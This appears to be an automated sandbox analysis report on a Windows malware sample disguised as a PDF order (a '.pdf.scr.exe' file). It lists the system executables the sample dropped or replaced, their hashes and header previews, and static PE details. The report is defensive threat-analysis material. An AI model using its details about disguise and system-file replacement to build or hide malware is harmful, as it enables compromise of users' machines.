MD5:	85CD8E74A449C76731ED7FDB851B5F8D
SHA1:	5BAC1F0477A6339E3427529AAB8185185905D261
SHA-256:	2C5DB215CC9EFD789E3517B2723D4D88C2087B212BB41C1B3036A209BDAB04D6
SHA-512:	BB053434FF06A7D1EC896E6FC6945A622138E8E3EDE3CFE23BFCB518A9660976DA3D492D76A99D55FC7D18723EEAD8943B2C264568C0E0FD37A152E337DC21C4
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......zq..>...>...>...7h..D...{..4...{..=...>...+...{..9...{..V...{......{n.?...{l.?...{..?...Rich>...........PE..d...)ew..........."................. ~.........@....................................{..... .......... .................................................. .......@k...................l..T...................@...(...p...............h................................text............................... ..`.rdata.............................@..@.data....8.......*..................@....pdata..@k.......l..................@..@.didat..8....p.......>..............@....rsrc... ............@..............@..@.reloc...............F..............@...........................................................................................................................................................................................................................

C:\Windows\System32\TieringEngineService.exe

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1455616
Entropy (8bit):	5.476614095005113
Encrypted:	false
SSDEEP:	24576:1JnJ5D3WYssqjnhMgeiCl7G0nehbGZpbD:1JnJ5DGYYDmg27RnWGj
MD5:	408AC76B0282CB4A6BE24FC175D1830D
SHA1:	E027F51CF96322C6BE42F50DCEDE07E9793CA71D
SHA-256:	88A4140877D8602C3C33A22991A8D08F9F5DCE561F6408F58C329C795C6832B0
SHA-512:	20D670A1B6678FD759A6E4DFBE3E4E5AA5E818C265BC3D075FF6E89D97F8AE2AF0D5E9E2445CF57490FFBADF26FD13EB447E4A1DADAE4A49394B53E9F06F0EDD
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........w............nP.....}.....}........Z...}.....}.....}.....}<....}.....Rich............................PE..d................."............................@.....................................\.... .......... ..........................................H...............p....................p..T...................h:..(...P9...............:..@... ...@....................text...\|........................... ..`.rdata.......0......................@..@.data...............................@....pdata..p...........................@..@.didat..............................@....rsrc...............................@..@.reloc...P...0...@..................@...................................................................................................................................................................................................................

C:\Windows\System32\VSSVC.exe

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2075136
Entropy (8bit):	6.736598302179523
Encrypted:	false
SSDEEP:	49152:GPK86JYTerDjfJ2313e1mP1MdnUDDmg27RnWGj:0D527BWG
MD5:	F1189749CCB5D474E630DA16D3844562
SHA1:	8A3260044A8D94742691D011D311F56BAC87EA7F
SHA-256:	8C7F72C673F50F31155EA2F00E82B7152E595FE04E168CC70244BEC0877F9311
SHA-512:	CFD553891F29F8187E50706F25A76651C8800DD395AC5BA35F01C15A8913EC43164BAA239DC221AF3B3C3A299D2ABFD2BD0911A4DE044C9D75B99B220388731E
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........@.e.!.6.!.6.!.6.YI6.!.6.J.7.!.6.J.7.!.6.!.6. .6.J.7.!.6.J.7.!.6.J.7.!.6.J%6.!.6.J.7.!.6Rich.!.6........PE..d...b.Xw.........."......v...f.......p.........@.............................. .....)..... .......... ..................................................@O...0..lx...................o..T............................................................................text....t.......v.................. ..`.rdata..`\|.......~...z..............@..@.data...............................@....pdata..lx...0...z..................@..@.didat..P............x..............@....rsrc...@O.......P...z..............@..@.reloc..............................@...................................................................................................................................................................................................................................

C:\Windows\System32\alg.exe

Download File

Process:	C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1225728
Entropy (8bit):	5.163312563427809
Encrypted:	false
SSDEEP:	12288:VEP3R64Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:W64sqjnhMgeiCl7G0nehbGZpbD
MD5:	D3EEF25FD8C9FF095347CDF4A8DCE6D5
SHA1:	7F71306BC0C13C1D12235A1BFAF84CA7DB02455B
SHA-256:	7D5A10CC0BA968384DC2FE9B5A665947557C71837C66E22B39D73BCDF5983893
SHA-512:	D9254D3B98F1F98285247A14F195EF96167CB86519762519FC5727A0FE633E818981BB4016A2EE132AA3B7427BE284446288822C8A165F96413BDB74B17FAB97
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,..dB.dB.dB....dB..A.dB..F.dB.dC.,dB..C.dB..G.dB..J.dB....dB..@.dB.Rich.dB.........PE..d...E.~..........."............................@....................................mu.... .......... ......................................`E...............p.. ................... ...T...............................................8...TA.......................text............................... ..`.rdata..rV.......X..................@..@.data........`.......@..............@....pdata.. ....p.......D..............@..@.didat...............R..............@....rsrc............ ...T..............@..@.reloc...P.......@...t..............@...................................................................................................................................................................................................................................

C:\Windows\System32\config\systemprofile\AppData\Roaming\314fa8116a46337b.bin

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	data
Category:	dropped
Size (bytes):	12320
Entropy (8bit):	7.98498584466714
Encrypted:	false
SSDEEP:	192:toOsFk6rfvoEfPZrv3xmcKaOfpuVTbUYuA/UCm0zMd1nl8ACBApJ9uveN0GG+:e/F3nnxv3xm+xhbUYuA/U3fLnSAe4a4
MD5:	2836CCEE9DFD2EAFDCB6CF3B817966C4
SHA1:	70B4D39EE9E148FCAABA37729B280970D4E97EF6
SHA-256:	A8562BE666FF5A80283E871508606288709AC685CE19385D8FF90831746163FF
SHA-512:	96D96295B9041C0BFAE2604EACC0376234C7051B850CDA514CDB55EFB04E64A7EE52B33DE79193C8DC8230DB8611FBC0941D38B0500F56BF92D0F64E0733925C
Malicious:	true
Reputation:	unknown
Preview:	.F....-..Xf.o&...\...+C#yFe.......R..U....Q.{1.....>;.)...E...6......%.r...".Z.0KW=...7C.).\|.l.A.. ..3...5]....dI=M......./PFO.!.p.....-....].........8...w...t....2..._N.......}.B.M.....1.Wx.6..a..-D..'I....?.....G:?...h.y..r.;....b.....8.Bx.JB.]8.0.......O.>.....g.@.F.WB.y...k.......x.f:[O8.07.w.a..X.a(....M.n.......hP....,`\.J..+...>fy.....=.....Y..B.L..]K..s.A.t....4~cR.kO.......q.5x.#..3[G..g...l.1.A.BT`n.3.`%.f..D.O.... .N+._.r..M........T..?...P...kv7kOm..x..s...r.O($.......D.....s..%..^..'..[...8..........vU.R..O....%..Pe.m....%_.VXudZ..!.&.;..r.~......u.-\|z..>......[...uR..@+kKJ..1..Q.ez.0.....zJ.....:.gsd.J..`JY...e..KW.4...,..B$4#...V@.................._+....S.4zE.O......+..8...M.{u.........H..#...z.#..{..(.f../Aw.O.~,.6.[....^AH.....6p.."SU.r....II.h.z].e.-.+..."..6...85..^w.;.lQ.wE{V_.l.4S....C..o.I...=K..g..~...n...x......I.p....p.W.~.A......x.Z,}...+!.....d.ky..om....H...$^2..q.;Bn...x..../......U...;._.d!.z..,.Z..uF..

C:\Windows\System32\msdtc.exe

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1278464
Entropy (8bit):	5.142997688264337
Encrypted:	false
SSDEEP:	12288:PjkyDXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:PIyDsqjnhMgeiCl7G0nehbGZpbD
MD5:	1F7D551740186E4DAF6F854689B6E196
SHA1:	00B0BAC8AEB74339FC125E97A0D8BFD1858243F6
SHA-256:	A8B580D64D47F7375A73E9027E95768FB60FDDF104021DBB3FCDF1FCF26CF8F9
SHA-512:	90A04F400B7F023CC4DAB31A2FBD5059F51CDC169C75445EC09AD7A58D87FDE1E3E6C372E5EB389210FEBB459DCF5A8EC75D968DF7C1100ADABB4594065B8F11
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Voq.Voq.Voq.B.r.Uoq.B.u.Coq._..}oq.B.p.^oq.Vop..oq.B.y.Noq.B.t.Roq.B...Woq.B.s.Woq.RichVoq.........................PE..d......D.........."......h..........0i.........@....................................26.... ..........@.............................................. ..xx......p...................`...T...........................@...............X...........@....................text....g.......h.................. ..`.rdata..pO.......P...l..............@..@.data....)..........................@....pdata..p...........................@..@.didat.. ...........................@....rsrc...xx... ...z..................@..@.reloc...P.......@...B..............@...................................................................................................................................................................................................................

C:\Windows\System32\msiexec.exe

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1199616
Entropy (8bit):	5.083908133171877
Encrypted:	false
SSDEEP:	12288:Y4DZXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:nZsqjnhMgeiCl7G0nehbGZpbD
MD5:	9EB6D1776BC3A05CFA6BBB6E2ECC3840
SHA1:	2FEDC5DCB93D7F475A5A3341D72B71010032652A
SHA-256:	9F2949C91A7A89993ED6BE3EBBE3E555F03FD9B95122915946DC60109F7B7764
SHA-512:	29634412FBE5E46B8801A8E90673122D02E8E933012FE2265A95A7F8625D0653A3B2832EC249CC3EEB5EF7DD24906E92BDC3D6E577B5DF060D393E0EC33EEECE
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$................................................8..............................Rich............PE..d................"...........................@.......................................... .......... ......................................8........@....... ..........................T.............................................. .......@....................text...!........................... ..`.rdata..:7.......8..................@..@.data....$..........................@....pdata....... ......................@..@.didat.......0......................@....rsrc........@... ..................@..@.reloc...P...`...@..................@...........................................................................................................................................................................................................................................

C:\Windows\System32\snmptrap.exe

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1146880
Entropy (8bit):	5.02758957758713
Encrypted:	false
SSDEEP:	12288:i9lXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:olsqjnhMgeiCl7G0nehbGZpbD
MD5:	19B4E5A78D94F8465DEECD61EC5ACE39
SHA1:	2080F75FB981D2D570B2F425703E36AE96B0EA47
SHA-256:	64CDE0D90C20990C67FA75F968142DD8E6FADD1160D57F1C4FE977951E52F24D
SHA-512:	40EE4C46E0DBC94934A02D39E3663551D01BC3405B26ACDAD22E3B02D1F9A427BBD88B82F665D96BA6A2C9EB5BA37D250F6070CEB8D8C06C6B07C207A7672D06
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........^m.^?..^?..^?..JT.._?..JT..\?..JT..M?..JT..W?..^?...?..JT..\?..JT.._?..JT.._?..Rich^?..................PE..d....Ou..........."...... ...&......`'.........@....................................(..... .......... ......................................l8..d....`.......P..,...................p4..T............................0..............(1..X............................text... ........ .................. ..`.rdata.......0.......$..............@..@.data........@.......4..............@....pdata..,....P.......6..............@..@.rsrc........`.......8..............@..@.reloc...P...p...@...@..............@...........................................................................................................................................................................................................................................................................

C:\Windows\System32\sppsvc.exe

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	5161984
Entropy (8bit):	7.256986793495864
Encrypted:	false
SSDEEP:	98304:1CLZqizFGeZV8ppBcq+NFabvy5FEz9AGknxD527BWG:ULDzFGmVWQq+NFarCFUInxVQBWG
MD5:	9B4F8C5BC081973A56BA20D812ABE891
SHA1:	8A53FD743D439740E466DD6A5464F550447F6517
SHA-256:	D95C60098F051C63FC101E32F10AE2F5CA622F9979E1734E2AAD2B31FBF26328
SHA-512:	5EFCE8E918EE80F8C35B131C278853590F9641968708F675C9C73BC3C033D0743DFC0FA5E4DED39667D210F8FCA85A21BC92FD22C04043E1030A0097AE97AF47
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u".j1C.91C.91C.9j+.80C.98;89)C.9%(.8(C.9%(.83C.9%(.8"C.91C.9-B.9%(.8.C.9%(.85C.9%(T90C.9%(.80C.9Rich1C.9........PE..d.....}'..........".......:......... ..........@................CS P......... O.......N..................................................... ;C.......E..+....D..z..................PFA.T.....................<.(.....<...............<. ............................text...rs9......t9................. ..`?g_Encry.-....9......x9............. ..`?g_Encry\|-....9.......9............. ..`?g_Encry......9..0....9............. ..`?g_Encry.-... :.......:............. ..`.rdata.......P:......2:.............@..@.data...`....`C......>C.............@....pdata...z....D..\|....C.............@..@.rsrc....+....E..,...HE.............@..@.reloc...`....E..P...tE.............@...................................................................................................

C:\Windows\System32\vds.exe

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1303552
Entropy (8bit):	7.171615252517055
Encrypted:	false
SSDEEP:	24576:0Z0FxT1UoYr99GdcpKosqjnhMgeiCl7G0nehbGZpbD:owWcUDmg27RnWGj
MD5:	DC4E68C7DACCD86327AA7B0F9279759A
SHA1:	E92AF60A139F3E5A40364C73E2000523D3D6F0E7
SHA-256:	F35585621D3340C583ABFA37681A51CFB08F58E072AA87445575A8873AFD1923
SHA-512:	43D5B4F1805EE84563A873E850544B7D938C9C963B1C36CE906351F6DFFB2837B5F492E7EEFBAA988A6932DB3D3B162E7D888869E18CA646FC60915CF80DDF10
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........0..c..c..c..uc...c...b..c...b..c...b..c...b..c..cR..c...b...c...b..c...c..c...b..cRich..c................PE..d................."..........6......@..........@.............................@........... .......... ..................................8#......H....@...........,...................s..T...........................` ..............x!.......{.......................text............................... ..`.rdata..............................@..@.data...............................@....pdata...,..........................@..@.didat.......0......................@....rsrc........@......................@..@.reloc.......P......................@...................................................................................................................................................................................................................

C:\Windows\System32\wbem\WmiApSrv.exe

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1339392
Entropy (8bit):	5.2693076939873125
Encrypted:	false
SSDEEP:	12288:dyoKo2fRple9pbXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DB9:dyocJApbsqjnhMgeiCl7G0nehbGZpbD
MD5:	EF4FD39A2277013080B04DC0040D3657
SHA1:	FA9BEA4AD0F5C38A1DCE2D276F2D7FAF2F8AFBE4
SHA-256:	93D8D6C31AC52892275DF73AF257A1153D8E2CAEECAE606C888D9C81CEA19FF0
SHA-512:	8EB5E134EEB40106121A49D8FD6820E861F35A3EA70703B513B1A80DCC9826553D7332B8370B7E778D739AF7E0C3D5EE8AE394BC3B3620B1528079D3DB952DC4
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........N]...]...]...T...k...I..^...I..J...]...T...I..Z...I..W...I..h...I..\...I.n.\...I..\...Rich]...........................PE..d...&Gf..........."..........Z......0..........@.......................................... .......... ..............................0....%......0....`.. ....0.......................B..T...................h...(...P.......................$........................text...?........................... ..`.rdata..............................@..@.data...............................@....pdata.......0... ..................@..@.didat..(....P.......$..............@....rsrc... ....`.......&..............@..@.reloc...P...p...@...0..............@...........................................................................................................................................................................................................

C:\Windows\System32\wbengine.exe

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2164736
Entropy (8bit):	7.062053950030494
Encrypted:	false
SSDEEP:	49152:yWcnPqQUGpuphwC0DNLDpaRFXrLuWGMKCIKjDmg27RnWGj:k0zuNIvD527BWG
MD5:	9BAF92794722B7FC220CAF5B542CC8E8
SHA1:	84D333D426F00B7BE04A45DA59CB1C1E94952764
SHA-256:	FABF7CACD62401B8D98453708CC9C90F24908084DDE3BCF6D1C7E31C1872F362
SHA-512:	9F4D4955E654CB00465F37C282BF2948125C45B091AB364F7650522853EF917712FC631C469E40F6F914147FE2D4FCC9DCAD384928A064F05E32C10FA6BD19E7
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............M...M...M..L...M..L...M..L...M..L...M...My..M..L4..M..L...M..pM...M..L...MRich...M........PE..d....c..........."..........`...... ..........@.............................`!......."... .......... ...............................z......h...\|....`...........w..................p...T...................x...(...`................................................text............................... ..`.rdata..............................@..@.data....%..........................@....pdata...w.......x..................@..@.rsrc........`......................@..@.reloc.......p.......(..............@...........................................................................................................................................................................................................................................................................

C:\Windows\Temp\DiagOutputDir\HolographicDevice.etl

Download File

Process:	C:\Windows\System32\Spectrum.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.10010587329843844
Encrypted:	false
SSDEEP:	6:Qc/ilt1K3l/k/uMclF6vMclFq5zwD0NOn+SkUeYDwDzymyilt1zj:n/ilKV/kqF69Fq5ztO+pawHymyilv
MD5:	D31953A99C1F0CEF8F20ECF88B2424CA
SHA1:	E72B8ADB6171D7293AE699998B61D957CEBB4058
SHA-256:	60109BD0D42A0396E1C4E6AA40B6EF9D7EAC3F2ADEFDBF915665DE9C8D8E4120
SHA-512:	8AC09810D04CFCB4A54E41D75F1CD03F7E23738B48A82361992F26A4D674FF6DE2F55924A40EC5B5B43241A655080D5EF4B2177BEC0A33EC086B751782351E5B
Malicious:	false
Reputation:	unknown
Preview:	....`...`.......................................`...!....................................@8.....................eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1..............................................................O.............;.gXA..........H.o.l.o.g.r.a.p.h.i.c.D.e.v.i.c.e...C.:.\.W.i.n.d.o.w.s.\.T.e.m.p.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.H.o.l.o.g.r.a.p.h.i.c.D.e.v.i.c.e...e.t.l...........P.P..........@8.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\DiagOutputDir\HolographicDeviceHeT.etl

Download File

Process:	C:\Windows\System32\Spectrum.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.10154083772249754
Encrypted:	false
SSDEEP:	6:DA/aK3l/k/uMclF6vMclFq5zw5sNMu3n+SkUeYDwDzyMQ/azb:DAyKV/kqF69Fq5ziUX+pawHyJyn
MD5:	85206D3492B5D8E93808D619E40C009E
SHA1:	7FC4620D3F8F0C9E6F916E2474EDB1619E70714A
SHA-256:	1B16E41DEAF498F3DAE4C275A92FD14ECCE21044D62A370ED5B47F0F34A1C00B
SHA-512:	DA65C9FCC060719BE5F7AFBFC152AD54479DDBD90E633A1CB311B8D253484B0D8A792675DA6A486B07C8D11356EE6C2E53FCD6AF6871F24C23528C63FDFD7B03
Malicious:	false
Reputation:	unknown
Preview:	....h...h.......................................h...!.....................................9.....................eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1..............................................................O...............gXA..........H.o.l.o.g.r.a.p.h.i.c.D.e.v.i.c.e.H.e.T...C.:.\.W.i.n.d.o.w.s.\.T.e.m.p.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.H.o.l.o.g.r.a.p.h.i.c.D.e.v.i.c.e.H.e.T...e.t.l.......P.P...........9.............................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\DiagOutputDir\HolographicShell.etl

Download File

Process:	C:\Windows\System32\Spectrum.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.09898702226898966
Encrypted:	false
SSDEEP:	6:uQ5L1K3Nk/uMclF6vMclFq5zw1ANIn+SkUeYDwDzyyL1zr:uOhK9kqF69Fq5zywI+pawHyyh3
MD5:	3DA2A0E021FD13FA2F2540CC70D7F70F
SHA1:	EB04DE4DA18A140B9BD232F9B0A5DFEAD217221B
SHA-256:	8BC5AECD284C4597A1900B91A8224F8608933D27AA174A2AC4A0183274530E6B
SHA-512:	DBDC41F50EAED1937B7C63AF8F0AA3F5F1B26197E0513CAEDC321907167C26C50C0C1B5654B7D7BF8E090476CF3DA18288C8D208BF14B9BD6640B2F13FE7CEA7
Malicious:	false
Reputation:	unknown
Preview:	....X...X.......................................X...!.....................................8.....................eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1..............................................................O...............gXA..........H.o.l.o.g.r.a.p.h.i.c.S.h.e.l.l...C.:.\.W.i.n.d.o.w.s.\.T.e.m.p.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.H.o.l.o.g.r.a.p.h.i.c.S.h.e.l.l...e.t.l.......P.P...........8.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................

\Device\Null

Download File

Process:	C:\Windows\SysWOW64\timeout.exe
File Type:	ASCII text, with CRLF line terminators, with overstriking
Category:	dropped
Size (bytes):	66
Entropy (8bit):	4.524640141725149
Encrypted:	false
SSDEEP:	3:hYF0ZAR+mQRKVxLZQtL1yn:hYFoaNZQtLMn
MD5:	04A92849F3C0EE6AC36734C600767EFA
SHA1:	C77B1FF27BC49AB80202109B35C38EE3548429BD
SHA-256:	28B3755A05430A287E4DAFA9F8D8EF27F1EDA4C65E971E42A7CA5E5D4FAE5023
SHA-512:	6D67DF8175522BF45E7375932754B1CA3234292D7B1B957D1F68E4FABE6E7DA0FC52C6D22CF1390895300BA7F14E645FCDBF9DCD14375D8D43A3646C0E338704
Malicious:	false
Reputation:	unknown
Preview:	..Waiting for 6 seconds, press a key to continue ....5.4.3.2.1.0..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.644283654008633
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Order SMG 201906 20190816order.pdf.scr.exe
File size:	2'267'648 bytes
MD5:	eb8d251c25ab63697fb69a403af0f09f
SHA1:	0d888453df23f50c61abbc8f2216d2fbe986716e
SHA256:	9a759f2ef8ee16b697f30aab51fc726f9697b338e0aba56c063860146bbfc76b
SHA512:	e066f17a6e42eacd053eac6f5274a2fe4bec4bd068b04d492d61aea3b9a9aada2e5a7228935862e7dfc51dbed083e69de085525a2124702719de6d1bb9b7ec92
SSDEEP:	24576:ktb20p1aCqT5TBWgNQ7aFPXgTcE4K6O6Y22yGhfP+3YR5Qwcb6A2sqjnhMgeiCln:N6g5tQ7aFfarFYY3lu56Dmg27RnWGj
TLSH:	79A5012263DD8361C3B25273BA5AB741AE7B7C2546B0F96B2FD4093DF820161425FA73
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x425f74
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x6747292F [Wed Nov 27 14:14:07 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	3d95adbf13bbe79dc24dccb401c12091

Entrypoint Preview

Instruction
call 00007F3A74E4AC8Fh
jmp 00007F3A74E3DCA4h
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F3A74E3DE2Ah
cmp edi, eax
jc 00007F3A74E3E18Eh
bt dword ptr [004C0158h], 01h
jnc 00007F3A74E3DE29h
rep movsb
jmp 00007F3A74E3E13Ch
cmp ecx, 00000080h
jc 00007F3A74E3DFF4h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007F3A74E3DE30h
bt dword ptr [004BA370h], 01h
jc 00007F3A74E3E300h
bt dword ptr [004C0158h], 00000000h
jnc 00007F3A74E3DFCDh
test edi, 00000003h
jne 00007F3A74E3DFDEh
test esi, 00000003h
jne 00007F3A74E3DFBDh
bt edi, 02h
jnc 00007F3A74E3DE2Fh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007F3A74E3DE33h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007F3A74E3DE85h
bt esi, 03h
jnc 00007F3A74E3DED8h
movdqa xmm1, dqword ptr [esi+00h]

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2012 UPD4 build 61030
[RES] VS2012 UPD4 build 61030
[LNK] VS2012 UPD4 build 61030

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb7004	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc4000	0xd2e50	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x8d8d0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xb2730	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8d000	0x860	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8b54f	0x8b600	3567c293cd0364344de570a0fcb2eae0	False	0.5699499019058296	data	6.680426153100061	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8d000	0x2cc42	0x2ce00	827ffd24759e8e420890ecf164be989e	False	0.330464397632312	data	5.770192333189168	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xba000	0x9d54	0x6200	e0a519f8e3a35fae0d9c2cfd5a4bacfc	False	0.16402264030612246	data	2.002691099965349	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc4000	0xd2e50	0xd3000	201b58cdfc974916e6668a64d26c1f9f	False	0.9688657064573459	data	7.971348045655476	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x197000	0x99000	0x98000	8755e4f0b1020ad76ef12152e1826949	False	0.9550138774671053	data	7.871422860138387	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc45a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc46d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc47f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc4920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xc4c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xc4d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xc5bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xc6480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xc69e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
